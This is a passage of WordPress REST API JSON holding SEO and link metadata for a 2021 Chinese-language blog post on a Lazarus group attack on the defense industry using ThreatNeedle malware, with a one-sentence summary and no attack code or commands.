-->","yoast_head_json":{"title":"APT\u653b\u9632\u63a8\u6f14\uff1aLazarus\u7ec4\u7ec7\u9488\u5bf9\u56fd\u9632\u5de5\u4e1a\u7684\u4e00\u6b21\u653b\u51fb - Wayne&#039;s Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/weizn.net\/?p=780","og_locale":"zh_CN","og_type":"article","og_title":"APT\u653b\u9632\u63a8\u6f14\uff1aLazarus\u7ec4\u7ec7\u9488\u5bf9\u56fd\u9632\u5de5\u4e1a\u7684\u4e00\u6b21\u653b\u51fb - Wayne&#039;s Blog","og_description":"Lazarus\u88ab\u79f0\u4e4b\u4e3a\u4e3a2020\u5e74\u6700\u6d3b\u8dc3\u7684APT\u7ec4\u7ec7\uff0c\u5728\u653b\u51fb\u4e2d\u4f7f\u7528\u7684\u6076\u610f\u8f6f\u4ef6\u5c5e\u4e8e\u4e00\u4e2a\u88ab\u547d\u540d\u4e3aThreatNeedle\u7684\u5bb6\u65cf\u3002Lazarus\u66fe\u4f7f\u7528\u8fd9\u4e2a\u6076\u610f\u8f6f\u4ef6\u653b\u51fb\u5404\u4e2a\u884c\u4e1a\u3002\u57282020\u5e74\u4e2d\u671f\uff0c\u6355\u83b7\u5230Lazarus\u6b63\u5728\u4f7f\u7528ThreatNeedle\u5bf9\u56fd\u9632\u5de5\u4e1a\u53d1\u8d77\u653b\u51fb\uff0c\u5230\u76ee\u524d\u4e3a\u6b62\uff0c\u5df2\u7ecf\u6709\u5341\u51e0\u4e2a\u56fd\u5bb6\u7684\u7ec4\u7ec7\u53d7\u5230\u5f71\u54cd\u3002","og_url":"http:\/\/weizn.net\/?p=780","og_site_name":"Wayne&#039;s Blog","article_published_time":"2021-08-20T09:20:48+00:00","article_modified_time":"2021-08-25T09:18:00+00:00","og_image":[{"width":1250,"height":460,"url":"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/lazarusgroup.jpeg","path":"\/app\/wp-content\/uploads\/2021\/08\/lazarusgroup.jpeg","size":"full","id":818,"alt":"","pixels":575000,"type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"zinan","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"7 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"http:\/\/weizn.net\/#website","url":"http:\/\/weizn.net\/","name":"Wayne&#039;s Blog","description":"","publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/weizn.net\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"ImageObject","@id":"http:\/\/weizn.net\/?p=780#primaryimage","inLanguage":"zh-Hans","url":"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/lazarusgroup.jpeg","contentUrl":"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/lazarusgroup.jpeg","width":1250,"height":460},{"@type":"WebPage","@id":"http:\/\/weizn.net\/?p=780#webpage","url":"http:\/\/weizn.net\/?p=780","name":"APT\u653b\u9632\u63a8\u6f14\uff1aLazarus\u7ec4\u7ec7\u9488\u5bf9\u56fd\u9632\u5de5\u4e1a\u7684\u4e00\u6b21\u653b\u51fb - Wayne&#039;s Blog","isPartOf":{"@id":"http:\/\/weizn.net\/#website"},"primaryImageOfPage":{"@id":"http:\/\/weizn.net\/?p=780#primaryimage"},"datePublished":"2021-08-20T09:20:48+00:00","dateModified":"2021-08-25T09:18:00+00:00","breadcrumb":{"@id":"http:\/\/weizn.net\/?p=780#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["http:\/\/weizn.net\/?p=780"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/weizn.net\/?p=780#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"http:\/\/weizn.net\/"},{"@type":"ListItem","position":2,"name":"APT\u653b\u9632\u63a8\u6f14\uff1aLazarus\u7ec4\u7ec7\u9488\u5bf9\u56fd\u9632\u5de5\u4e1a\u7684\u4e00\u6b21\u653b\u51fb"}]},{"@type":"Article","@id":"http:\/\/weizn.net\/?p=780#article","isPartOf":{"@id":"http:\/\/weizn.net\/?p=780#webpage"},"author":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"headline":"APT\u653b\u9632\u63a8\u6f14\uff1aLazarus\u7ec4\u7ec7\u9488\u5bf9\u56fd\u9632\u5de5\u4e1a\u7684\u4e00\u6b21\u653b\u51fb","datePublished":"2021-08-20T09:20:48+00:00","dateModified":"2021-08-25T09:18:00+00:00","mainEntityOfPage":{"@id":"http:\/\/weizn.net\/?p=780#webpage"},"wordCount":190,"commentCount":0,"publisher":{"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264"},"image":{"@id":"http:\/\/weizn.net\/?p=780#primaryimage"},"thumbnailUrl":"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/lazarusgroup.jpeg","keywords":["APT","\u653b\u9632\u63a8\u6f14"],"articleSection":["\u5e94\u7528\u5b89\u5168"],"inLanguage":"zh-Hans","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["http:\/\/weizn.net\/?p=780#respond"]}]},{"@type":["Person","Organization"],"@id":"http:\/\/weizn.net\/#\/schema\/person\/e88bc12c590502d8b6249326f960b264","name":"zinan","logo":{"@id":"http:\/\/weizn.net\/#personlogo"}}]}},"_links":{"self":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/780","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=780"}],"version-history":[{"count":23,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/780\/revisions"}],"predecessor-version":[{"id":868,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/posts\/780\/revisions\/868"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=\/wp\/v2\/media\/818"}],"wp:attachment":[{"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=780"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=780"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/weizn.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=780"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}